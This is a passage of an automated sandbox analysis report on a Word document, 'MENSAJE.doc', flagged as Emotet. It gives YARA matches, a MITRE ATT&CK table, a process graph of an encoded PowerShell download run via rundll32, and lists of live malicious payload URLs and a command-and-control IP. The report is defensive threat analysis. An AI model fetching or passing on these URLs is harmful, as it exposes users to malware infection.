                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000010.00000002.2195836054.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2118741033.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2205409223.0000000000130000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2173526087.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2186412601.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2108873547.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2097454036.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2163054350.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2163067625.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2118727946.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2178762795.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2336521474.0000000000720000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2154976635.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2108849548.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2152593179.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2152580168.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2338110050.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2173536916.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2129792071.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2129775635.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2188065984.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2121402086.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2336299339.0000000000100000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2130727723.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2144677498.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2145636371.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2205471749.0000000000260000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2144648920.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2198917557.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2186005336.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2163840941.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2195824360.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2097343885.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2206163057.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2110270893.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 12.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.130000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.6d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.6d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.3b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.100000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.720000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.3b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.100000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.130000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.6b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.220000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.260000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.6b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.720000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Masquerading21OS Credential DumpingSecurity Software Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsCommand and Scripting Interpreter211Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsScripting32Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Process Injection111NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsPowerShell3Network Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonScripting32Cached Domain CredentialsSystem Information Discovery15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsHidden Files and Directories1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information11Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 343668 Sample: MENSAJE.doc Startdate: 25/01/2021 Architecture: WINDOWS Score: 100 49 Multi AV Scanner detection for domain / URL 2->49 51 Antivirus detection for URL or domain 2->51 53 Multi AV Scanner detection for dropped file 2->53 55 15 other signatures 2->55 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 28 2->17         started        process3 signatures4 63 Suspicious powershell command line found 14->63 65 Very long command line found 14->65 67 Encrypted powershell cmdline option found 14->67 19 powershell.exe 12 9 14->19         started        24 msg.exe 14->24         started        process5 dnsIp6 47 nadysa.com 217.144.106.11, 49165, 80 NETMIHANIR Iran (ISLAMIC Republic Of) 19->47 45 C:\Users\user\Liq8l58gok7ei\D64O.dll, PE32 19->45 dropped 59 Powershell drops PE file 19->59 26 rundll32.exe 19->26         started        file7 signatures8 process9 process10 28 rundll32.exe 26->28         started        process11 30 rundll32.exe 2 28->30         started        signatures12 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->69 33 rundll32.exe 30->33         started        process13 process14 35 rundll32.exe 1 33->35         started        signatures15 57 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->57 38 rundll32.exe 35->38         started        process16 process17 40 rundll32.exe 1 38->40         started        signatures18 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->61 43 rundll32.exe 40->43         started        process19

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      MENSAJE.doc62%VirustotalBrowse

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\Liq8l58\Egok7ei\D64O.dll100%Joe Sandbox ML
                      C:\Users\user\Liq8l58\Egok7ei\D64O.dll46%MetadefenderBrowse
                      C:\Users\user\Liq8l58\Egok7ei\D64O.dll79%ReversingLabsWin32.Trojan.EmotetCrypt

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      11.2.rundll32.exe.200000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.1c0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      14.2.rundll32.exe.1c0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.1c0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      13.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      15.2.rundll32.exe.3b0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.6d0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      16.2.rundll32.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      13.2.rundll32.exe.1c0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.1e0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      18.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.220000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      14.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      16.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      16.2.rundll32.exe.1c0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      17.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      14.2.rundll32.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      17.2.rundll32.exe.260000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.6b0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      13.2.rundll32.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.2a0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      15.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      18.2.rundll32.exe.720000.1.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      nadysa.com5%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://lvnskin.com/h/IB/12%VirustotalBrowse
                      http://lvnskin.com/h/IB/100%Avira URL Cloudmalware
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://nadysa.com/wp-content/Almet/14%VirustotalBrowse
                      http://nadysa.com/wp-content/Almet/100%Avira URL Cloudmalware
                      http://crooks-taylor.com/1676470973/1/13%VirustotalBrowse
                      http://crooks-taylor.com/1676470973/1/100%Avira URL Cloudmalware
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://rabiei.fun/eidl-reconsideration-bs3lu/feoOiAO/8%VirustotalBrowse
                      http://rabiei.fun/eidl-reconsideration-bs3lu/feoOiAO/100%Avira URL Cloudmalware
                      http://rex.tasmiragroup.com/wp-includes/un6G/100%Avira URL Cloudmalware
                      http://84.232.229.24/v50s5eb3yu/ikc5f/tm3n1kmbtr/xhcy92qsfj3ttmk7xna/nflksuq0nonbqij/0%Avira URL Cloudsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      http://whitetheme.xyz/wp-content/q8H/100%Avira URL Cloudmalware
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://boomarketer.com/wp-content/6/100%Avira URL Cloudmalware
                      http://nadysa.com100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      nadysa.com
                      217.144.106.11
                      truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://nadysa.com/wp-content/Almet/true
                      • 14%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      unknown
                      http://84.232.229.24/v50s5eb3yu/ikc5f/tm3n1kmbtr/xhcy92qsfj3ttmk7xna/nflksuq0nonbqij/true
                      • Avira URL Cloud: safe
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2098558453.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097747134.0000000000B37000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109132236.0000000000A97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2121227769.00000000023D7000.00000002.00000001.sdmpfalse
                        high
                        http://www.windows.com/pctv.rundll32.exe, 0000000A.00000002.2129931457.0000000000870000.00000002.00000001.sdmpfalse
                          high
                          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpowershell.exe, 00000005.00000002.2094406328.0000000003AE8000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://investor.msn.comrundll32.exe, 00000006.00000002.2098421333.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097577001.0000000000950000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2108996769.00000000008B0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2120167840.00000000021F0000.00000002.00000001.sdmpfalse
                            high
                            http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2098421333.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097577001.0000000000950000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2108996769.00000000008B0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2120167840.00000000021F0000.00000002.00000001.sdmpfalse
                              high
                              http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2098558453.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097747134.0000000000B37000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109132236.0000000000A97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2121227769.00000000023D7000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2088948505.0000000002330000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109674521.0000000002820000.00000002.00000001.sdmpfalse
                                high
                                http://lvnskin.com/h/IB/powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmptrue
                                • 12%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                unknown
                                http://ocsp.sectigo.com0powershell.exe, 00000005.00000002.2094406328.0000000003AE8000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://crooks-taylor.com/1676470973/1/powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmptrue
                                • 13%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                unknown
                                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#powershell.exe, 00000005.00000002.2094406328.0000000003AE8000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://investor.msn.com/rundll32.exe, 00000006.00000002.2098421333.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097577001.0000000000950000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2108996769.00000000008B0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2120167840.00000000021F0000.00000002.00000001.sdmpfalse
                                  high
                                  http://rabiei.fun/eidl-reconsideration-bs3lu/feoOiAO/powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmptrue
                                  • 8%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://rex.tasmiragroup.com/wp-includes/un6G/powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://sectigo.com/CPS0Dpowershell.exe, 00000005.00000002.2094406328.0000000003AE8000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://whitetheme.xyz/wp-content/q8H/powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://www.%s.comPApowershell.exe, 00000005.00000002.2088948505.0000000002330000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109674521.0000000002820000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  low
                                  http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2098558453.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097747134.0000000000B37000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109132236.0000000000A97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2121227769.00000000023D7000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2098421333.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097577001.0000000000950000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2108996769.00000000008B0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2120167840.00000000021F0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2129931457.0000000000870000.00000002.00000001.sdmpfalse
                                    high
                                    http://boomarketer.com/wp-content/6/powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
